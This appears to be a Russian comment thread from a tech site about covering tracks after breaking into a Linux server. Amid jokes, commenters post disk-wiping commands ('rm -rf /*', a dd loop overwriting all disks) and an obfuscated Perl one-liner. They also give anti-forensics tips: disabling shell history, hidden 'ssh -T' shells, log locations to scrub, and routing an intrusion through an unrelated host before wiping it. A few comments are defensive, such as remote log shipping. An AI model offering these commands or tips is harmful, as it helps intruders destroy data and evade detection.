Заметаем следы

[evil_random]

А, чуть не забыл. Самые суровые скрывают следы командой rm -rf /

[Orlangur]

rm -rf /*

[1024]

# rm -rf /*

[Orlangur]

:)

[intellinside]

# perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
=)

[Sindorian]

sudo rm -rf /*

[bSun]

Сработает не везде :)
Правильнее вот так: cd / && rm -rf *

[ezotrank]

for i in $(ls /dev/sd[a-z]{1,}*); do dd if=/dev/urandom of=$i; done

[evil_random]

Это вещь! Да.
Но вот только у меня почему-то диски в /dev/hd*

[susanin]

тогда /dev/disk/by-uuid/

[susanin]

тогда /dev/disk/by-uuid/

[AlexeyK]

unset HISTFILE вообще, т.к. если оборвалось ссш соединение (попросту у вас выбило инет), то консоль убьется по таймауту и история сохранится, так что ваш метод канает не всегда. Что касается беспалевных заходов — ssh -T вам в помощь, никаких прав рута не понадобится, правда есть ограничения, кто заинтересовался — заглянет в ман.

[leave]

За (w/b/u)tmp тоже надо бы смотреть. Ну и в auth.log еще запись о логине сохраняется. А иногда и в messages дублируется.

[evil_random]

Зачем же сразу все секреты раскрывать. Я вот написал в общих чертах:

И пожалуй самое главное: не забывайте о том, что Linux ведет довольно подробные логи, и каждое ваше действие может быть где-то да и записано.

[mx2000]

также не забываем, что непосредственно перед хостом, на который вы лезете, может стоять еще парочка мелких сервачков, которые логируют все коннекты на интересующий вас хост. кроме этого, существует ряд системных средств, позволяющих отследить ваши чёрные дела. ;-)

[evil_random]

да, надо было подробнее тему осветить, с цепочками проксей, подчистой и поиском следов в других логах.

[mx2000]

Самый чистый способ сделать что-то действительно незаметно — заюзать ботнет. Только сначала нужно где-то этот ботнет раздобыть. Но эта тема, пожалуй, не для хабра, да и вообще, бяка. ;-)

[naryl]

Всё просто. Идёшь на машину жертвы через промежуточный хост в открытом интернете. Сделав дело, rm -rf /* его. Только в качестве промежуточного лучше использовать хост, никак не связанный с тобой.

Если не хотите сильно навредить невольной жертве — владельцу промежуточноо хоста, есть ключик --one-file-system у rm

[evil_random]

в debian не показывает.

[parta]

мвахахах Ж) уж не знаю как там в тазиках торвальца и знать не желаю, а во всех нормальных юнипсах системые логи и аудит пользователей не почистить без прав рута, ну и конечно рута просто так не получить скачав эксплойтег :D а выходит из консоли при помощи килла — это да, сильно. не проще ли просто напросто в шелле отключить ведение истории комманд?

[davnozdu]

$ ssh -T user@host /bin/bash -i

opens a «hidden» remote shell (login will not appear in «last» for example).

This is not really hidden, because the login will be shown in auth.log and the process is visible anyways.

ssh -T = Disable pseudo-tty allocation.

bash -i = interactive shell

[davaeron]

«Для операций с файлом lastlogin нужны права root.»

Для lastlog может?

[evil_random]

Да, вы правы.

[br0ziliy]

Кто как привык конечно… Я в профиль себе export HISTFILE="" прописал — и счастлив…

[stager]

last -f /var/log/wtmp

таки покажет ваш исправленый в lastlog'е ойпи, что будет несколько конфузно

а вообще же, имея рутовый доступ переживать об какихто там скрываниях покровов — ну както не солидно.

[Cancel]

export HISTCONTROL=ignorespace

После этой волшебной строчки в лог не попадут команды, начинающиеся с пробела. Очень удобно, например, для команд типа « sudo halt». Работает в bash

[kelevra]

sshd забыли.

Mar 6 12:16:28 jetta sshd[74892]: Did not receive identification string from 151.8.228.80
Mar 6 12:22:13 jetta sshd[76376]: Accepted publickey for raven from 10.72.1.102 port 1767 ssh2

[alexkbs]

~ $ alias logout="kill -9 $$"
~ $ logout

[alfa]

Именно поэтому пишу логи со всех серверов по сети на другой сервак :)

[ivanrt]

Отсутствующий lastlog сам по себе след от взлома.